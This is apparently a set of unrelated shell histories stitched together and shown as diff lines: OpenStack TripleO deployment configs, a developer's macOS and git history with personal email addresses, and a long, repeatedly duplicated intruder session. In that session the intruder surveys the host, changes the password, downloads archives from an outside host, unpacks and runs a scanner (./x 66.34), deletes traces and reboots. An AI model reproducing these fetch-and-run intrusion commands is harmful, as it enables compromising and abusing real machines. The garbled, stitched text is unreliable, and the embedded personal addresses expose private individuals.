>node-config.yaml <node-config.yaml <~/templates/environments/network-environment.yaml +parameter_defaults: + NtpServer: '' + NeutronNetworkType: 'vxlan,vlan' + NeutronTunnelTypes: 'vxlan' + + EC2MetadataIp: + ControlPlaneDefaultRoute: + NeutronNetworkVLANRanges: 'datacentre:1:1000' + BondInterfaceOvsOptions: "bond_mode=active-backup" +EOF + +cat >network_data.yaml <> HostnameMap.yaml +parameter_defaults: + HostnameMap: + overcloud-controller-0: lab-controller01 + overcloud-controller-1: lab-controller02 + overcloud-controller-2: lab-controller03 + overcloud-compute-0: lab-compute01 + overcloud-objectstorage-0: lab-swift01 + +EOF + +cat << EOF >> ips-from-pool-all.yamlresource_registry: + OS::TripleO::Controller::Ports::ExternalPort: /usr/share/openstack-tripleo-heat-templates/network/ports/external_from_pool.yaml + OS::TripleO::Controller::Ports::InternalApiPort: /usr/share/openstack-tripleo-heat-templates/network/ports/internal_api_from_pool.yaml + OS::TripleO::Controller::Ports::StoragePort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_from_pool.yaml + OS::TripleO::Controller::Ports::StorageMgmtPort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_mgmt_from_pool.yaml + OS::TripleO::Controller::Ports::TenantPort: /usr/share/openstack-tripleo-heat-templates/network/ports/tenant_from_pool.yaml + + OS::TripleO::Compute::Ports::ExternalPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + OS::TripleO::Compute::Ports::InternalApiPort: /usr/share/openstack-tripleo-heat-templates/network/ports/internal_api_from_pool.yaml + OS::TripleO::Compute::Ports::StoragePort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_from_pool.yaml + OS::TripleO::Compute::Ports::StorageMgmtPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + OS::TripleO::Compute::Ports::TenantPort: /usr/share/openstack-tripleo-heat-templates/network/ports/tenant_from_pool.yaml + + OS::TripleO::CephStorage::Ports::ExternalPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + OS::TripleO::CephStorage::Ports::InternalApiPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + OS::TripleO::CephStorage::Ports::StoragePort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_from_pool.yaml + OS::TripleO::CephStorage::Ports::StorageMgmtPort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_mgmt_from_pool.yaml + OS::TripleO::CephStorage::Ports::TenantPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + + OS::TripleO::ObjectStorage::Ports::ExternalPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + OS::TripleO::ObjectStorage::Ports::InternalApiPort: /usr/share/openstack-tripleo-heat-templates/network/ports/internal_api_from_pool.yaml + OS::TripleO::ObjectStorage::Ports::StoragePort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_from_pool.yaml + OS::TripleO::ObjectStorage::Ports::StorageMgmtPort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_mgmt_from_pool.yaml + OS::TripleO::ObjectStorage::Ports::TenantPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + + OS::TripleO::BlockStorage::Ports::ExternalPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + OS::TripleO::BlockStorage::Ports::InternalApiPort: /usr/share/openstack-tripleo-heat-templates/network/ports/internal_api_from_pool.yaml + OS::TripleO::BlockStorage::Ports::StoragePort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_from_pool.yaml + OS::TripleO::BlockStorage::Ports::StorageMgmtPort: /usr/share/openstack-tripleo-heat-templates/network/ports/storage_mgmt_from_pool.yaml + OS::TripleO::BlockStorage::Ports::TenantPort: /usr/share/openstack-tripleo-heat-templates/network/ports/noop.yaml + +parameter_defaults: + ControllerIPs: + external: + - + - + - + internal_api: + - + - + - + storage: + - + - + - + storage_mgmt: + - + - + - + tenant: + - + - + - + ComputeIPs: + internal_api: + - + - + storage: + - + - + tenant: + - + - + ObjectStorageIPs: + storage: + - + - + - + storage_mgmt: + - + - + - + internal_api: + - + - + - + + + ControlFixedIPs: [{'ip_address':''}] + InternalApiVirtualFixedIPs: [{'ip_address':''}] + PublicVirtualFixedIPs: [{'ip_address':''}] + StorageVirtualFixedIPs: [{'ip_address':''}] + StorageMgmtVirtualFixedIPs: [{'ip_address':''}] +EOF + +ls +vi node-config.yaml +mkdir ~/bin/ +cat << 'EOF' > ~/bin/overcloud-deploy.sh +exec openstack overcloud deploy \ + --templates /usr/share/openstack-tripleo-heat-templates \ + -e templates/overcloud_images.yaml \ + -n templates/network_data.yaml \ + -e templates/environments/network-isolation.yaml \ + -e /usr/share/openstack-tripleo-heat-templates/environments/network-environment.yaml \ + -e templates/environments/network-environment.yaml \ + -e templates/environments/net-bond-with-vlans.yaml \ + -e templates/node-config.yaml \ + -e templates/inject-trust-anchor-hiera.yaml \ + -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-ansible-external.yaml \ + -e templates/ceph-external.yaml \ + -e templates/HostnameMap.yaml \ + -e templates/ips-from-pool-all.yaml + +EOF + +chmod 0755 bin/overcloud-deploy.sh +ls -lr +vim bin/overcloud-deploy.sh +ls +vi templates/ips-from-pool-all.yaml +vim bin/overcloud-deploy.sh +sh bin/overcloud-deploy.sh +vim bin/overcloud-deploy.sh +cat bin/overcloud-deploy.sh +time openstack overcloud deploy --templates /usr/share/openstack-tripleo-heat-templates -n templates/network_data.yaml -e /usr/share/openstack-tripleo-heat-templates/environments/network-environment.yaml -e templates/environments/network-environment.yaml -e templates/node-config.yaml -e templates/HostnameMap.yaml -e templates/ips-from-pool-all.yaml +cat >network_data.yaml < 256colors2.pl +ls +perl ./256colors2.pl +tmux +brew install tmux +tmux +vim ~/.bashrc +. ~/.bashrc +ls +vim 256colors2.pl +vim ./vimrc +vim ./.vimrc +vim ./.vimrc +vim 256colors2.pl +vim ./.vimrc +vim 256colors2.pl +vim ./.vimrc +brew -h +brew list +brew update && brew install phantomjs +brew update && brew install phantomjs +phantomjs +phantomjs +phantomjs +ls +vi tmp.js +phantomjs tmp.js +ls +open google.png +vi tmp.js +phantomjs tmp.js +open activity.png +exit +brew install ipa-gothic-fonts.noarch +brew install fonts-ipafont +fc-cache -f +phantomjs tmp.js +open activity.pdf +vi /etc/fonts/fonts.conf +exit +phantomjs +ls +phantomjs -v +phantomjs +ls +ls +ls +mkdir Phantomjs +ls +brew self-update +brew selfupdate +brew -h +brew update +brew -h +breww list +brew list +brew search selenium +brew install python +which python +vi ~/.bash_profile +. ~/.bash_profile +easy_install pip +sudo easy_install pip +pip +sudo pip install selenium +brew -list phantomjs +brew -help +brew -h +brew list phantomjs +brew install phantomjs +python +ps aux +ps +top +exit +exit +rvm list +gem list +gem install selenium-webdriver +irb +phantomjs +phantomjs -v +selenium +irb +script +exit +rvm default 1.9.2 +rvm list +rvm set 1.9.2 +rvm default +rvm list +rvm usage | grep default +rvm use 1.9.2 --defalt +rvm use 1.9.2 --default +rvm list +script +exit +rvm -v +rvm list +rvm default 1.9.2 +/bin/bash --login +exit +ls +history +history | grep perl +cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed +open typescript-processed +rvm +rvm use 1.9.2 +script +exit +gem +rvm -h +ruby -v +rvm -list +rvm -ls +rvn usage +rvm usage +rvm list +rvm install 1.9.2 +rvm use 1.9.2 +rvm 1.9.2 +/bin/bash --login` +/bin/bash --login +exit +find / -name WIRED +pwd +ls +wgetstamp=1375285567-59ef29d77e/etc_13.jpg +curlstamp=1375285567-59ef29d77e/etc_13.jpg +1;2c1;2c1;2c1;2c1;2c1;2c +ls +ls -altr +curlstamp=1375285567-59ef29d77e/etc_13.jpg +1;2c1;2c1;2c1;2c1;2c1;2c +man curl +stamp=1375285567-59ef29d77e/etc_13.jpg . +curlstamp=1375285567-59ef29d77e/etc_13.jpg . +brew install wget +man wget +wgetstamp=1375285567-59ef29d77e/etc_13.jpg +ls +open etc_13.jpg +wgetstamp=1375285826-e56cc7393c/etc_15.jpg +open etc_15.jpg +pip +brew install -help +brew -help +brew -h +brew serch pip +brew search pip +script +history | grep perl +371! +cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed +open typescript +open . +gem +script +pwd +sudo gem install sass +sass -v +mkdir css +mkdir scss +touch index.html +touch main.css +vim main.css +mv main.css ../scss/main.scss +pwd +sass scss/main.scss:css/main.css +less css/main.css +vim css/main.css +vim scss/main.css +vim scss/main.scss +sass scss/main.scss:css/main.css +vim css/main.css +vim scss/main.scss +vim css/main.css +sass scss/main.scss:css/main.css +vim css/main.css +sass --style expanded scss/main.scss:css/main.css +vim css/main.css +sass --style expanded --watch scss:css +sass --style expanded --watch scss:css & +vim scss/main.scss +vim css/main.css +jpbs +jobs +top +jobs +kill %1 +jobs +vagrant --version +vagrant box add precise32s.vagrantup.com/precise32.box +ls +mkdir myCentOSVM +vagrant box add centos64s/vagrant-boxes/CentOS-6.4-x86_64-v20130427.box +vagrant init centos64 +ls +less Vagrantfile +vagrant up +vagrant status +vagrant suspend +vagrant status +vagrant ssh +vagrant up +vagrant ssh +ls +vi Vagrantfile +vagrant reload +pwd +ls +vagrant ssh +ls +vagrant ssh +ls +vi index.html +mkdir myCentOSVM2 +vagrant init centos64 +ls +vi Vagrantfile +vagrant up +vi Vagrantfile +vi provision.sh +vagrant provision +vagrant ssh +vagrant packagee +wpd +pwd +vagrant package +ls +vagrant box add my_box package.box +ls ~/.vagrant.d/boxes +rm package.box +mkdir myBox && myBox +pwd +ls +vagrant plugin install sahara +vagrant plugi list +vagrant plugin list +vagrant sandbox on +vagrant sandbox status +vagrant ssh +touch test +vagrant up +exit +node +exit +node +typescript +script +which node +which node +script +node +exit +vagrant status +script +ls +ls +ls +find / name myCentOSVM +ls +ls +ls +vim .bashrc +history +ls +ls +ls +ls +ls +ls +ls -al +rm IE8.Win7.For.MacVirtualBox* +ls +ls +vim .bashrc +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +ls +echo $PATH +echo $PATH | less +echo $PATH | tr ":" " +" +vim .bash_profile +vim evernote.sh +sudo /#/bin/bash --login +ls +sudo vim /etc/postfix/gmail_passwd +sudo postmap /etc/postfix/gmail_passwd +ls +ls /etc/postfix/ +sudo rm /etc/postfix/gmail_passwd +sudo vim /etc/postfix/main.cf +postfix reload +sudo postfix reload +vi .evernote +ls +chmod +x evernote.sh +ls +./evernote.sh -f typescript-processed +ls -al +./evernote.sh -f typescript-processed -a twol.b48a7@m.evernote.com +./evernote.sh -u -f typescript-processed -a twol.b48a7@m.evernote.com +./evernote.sh -f typescript -a twol.b48a7@m.evernote.com +history | grep perl +cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed +./evernote.sh -f typescript-processed -a twol.b48a7@m.evernote.com +vim .evernote +~/.evetnote +vim ~/.evetnote +pwd +ls +~/.evetnote +vim ~/.evetnote +cat .evernote +cat .evernote ~/.evernote +cat .evernote > ~/.evernote +vim ~/.evetnote +vim ~/.evetnote +ls +ls -altr +rm .evernote +ls +./evernote.sh -f typescript-processed -T 自習室 +history | grep find +find / -name myCentOSVM +ls +ls +vagrant box list +mkdir myCentOSVM +vagrant init centos64 +ls +vagrant up +ls +pwd +pwd +vagrant status +vagrant ssh +ls +ls +ls +ls +ls +ls +ks -altr +ls -al +vagrant destroy +ls +ls +rm -R IE8.Win7.For.MacVirtualBox/ +ls +ls +rm ie8win7/ +rm ie8win7/ -R +rm -R ie8win7/ +ls +ls +rm -R ie8win7/ +ls +cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed +exit +exit +ls -altr +cat typescript-processed +:q +exit +history | grep perl +120! +cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed +ls +ll +ll +ls -altr +script +cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed +ls +history | grep evernote.sh +./evernote.sh -f typescript-processed +script +vim ./vimrc +vim.vimrc +vim .vimrc +git +vim .bashrc +history | grep perl +echo "cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed" +echo "cat typescript | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > typescript-processed" >> .bashrc +vim .bashrc +script +vim .bashrc +ls +man script +opensub typescript +ls +rename +ks +ls +ls | grep "^[0-9]{6}" +ls | grep "^[0-9]" +ls | grep "^[0-9]+" +ls | grep -E"^[0-9]+" +ls | grep -E "^[0-9]+" +ls | grep -E "^[0-9]{,6}" +ls | grep -E "^[0-9]{6,6}" +ls | grep -E "^10{6,6}" +ls | grep -E "^10[1-9]{4,4}" +for v in `ls | grep -E "^10[1-9]{4,4}"`; do echo 20$i; done +for v in `ls | grep -E "^10[1-9]{4,4}"`; do echo 20$v; done +for v in `ls | grep -E "^10[1-9]{4,4}"`; do mv 20$v; done +for v in `ls | grep -E "^10[1-9]{4,4}"`; do mv $v 20$v; done +ls | grep -E "^10[1-9]{4,4}" +ls +ls | grep -E "^10[0-9]{4,4}" +for v in `ls | grep -E "^10[0-9]{4,4}"`; do mv $v 20$v; done +ls +for v in `ls | grep -E "^11[0-9]{4,4}"`; do mv $v 20$v; done +ls +open . +~/Library/Application\ Support/Dock/ +ls +ls +ll +date +cp 602DAE53-79B7-479B-AC85-3C79EE406554.db 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commit -m "first commit" +git init +gti add +git add +git status +sudo git apt install +sudo apt git install +git init +add git . +git add +git status +git add calc.html +git m -"first commit" +git init +git add . +git commit -m "first commit" +git remote add origin git@github.com:krishnavenips/calculator.git +git remote -v +git push origin master +git remote -v +git push origin master +git remote add originshnavenips/calculator.git +git remote -v +git push origin master +echo "# calculator" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add originshnavenips/calculator.git +git push -u origin master +git config --global user.email "krishnavenis@qburst.com" +git config --global user.name "krishnavenips" +git commit -m "first commit" +git remote add originshnavenips/calculator.git +git remote addshnavenips/calculator.git +git push origin master +mkdr +11 +ll +dc assign1 +sudo krishnavenis +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy 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gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget 